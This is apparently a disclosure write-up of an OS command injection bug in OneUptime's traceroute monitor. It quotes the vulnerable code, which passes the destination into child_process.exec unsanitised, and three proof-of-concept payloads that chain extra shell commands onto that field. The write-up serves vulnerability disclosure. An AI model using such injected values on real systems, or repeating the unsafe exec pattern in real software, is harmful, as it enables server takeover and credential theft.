Vulnerability Summary
An OS command injection vulnerability was discovered in the NetworkPathMonitor.performTraceroute() method of OneUptime. This flaw allows any authenticated project user to execute arbitrary operating system commands on the Probe server by injecting shell metacharacters into a monitor's destination field.
I was credited as the reporter for this vulnerability.
Technical Details
The vulnerability exists in Probe/Utils/Monitors/MonitorTypes/NetworkPathMonitor.ts.
The performTraceroute() method constructs a shell command by directly interpolating the user-controlled destination parameter into a string template, then executes it via child_process.exec():
// Probe/Utils/Monitors/MonitorTypes/NetworkPathMonitor.ts
private static async performTraceroute(
destination: string, // ← attacker-controlled
maxHops: number,
timeout: number,
): Promise<TraceRoute> {
// ...
let command: string;
if (isWindows) {
command = `tracert -h ${maxHops} -w ${...} ${destination}`;
} else if (isMac) {
command = `traceroute -m ${maxHops} -w 3 ${destination}`;
} else {
command = `traceroute -m ${maxHops} -w 3 ${destination}`;
}
const tracePromise = execAsync(command); // ← shell execution
Because child_process.exec() spawns a shell (/bin/sh), any shell metacharacters (;, |, $(), etc.) in the destination variable will be interpreted, allowing for full command injection.
Proof of Concept
The following payloads successfully demonstrate execution:
# Payload 1: Semicolon chaining
destination = '127.0.0.1; id'
# [stdout]: uid=501(dxleryt) gid=20(staff) ...
# Payload 2: Pipe injection
destination = '127.0.0.1 | whoami'
# [stdout]: dxleryt
# Payload 3: Subshell execution
destination = '127.0.0.1$(echo INJECTED)'
# [stderr]: traceroute: unknown host 127.0.0.1INJECTED
Impact
This allows a malicious tenant in a multi-tenant SaaS deployment to:
- Execute arbitrary commands as the Probe service user
- Read sensitive files from the Probe server (environment variables, credentials)
- Pivot to internal services
- Establish persistent backdoors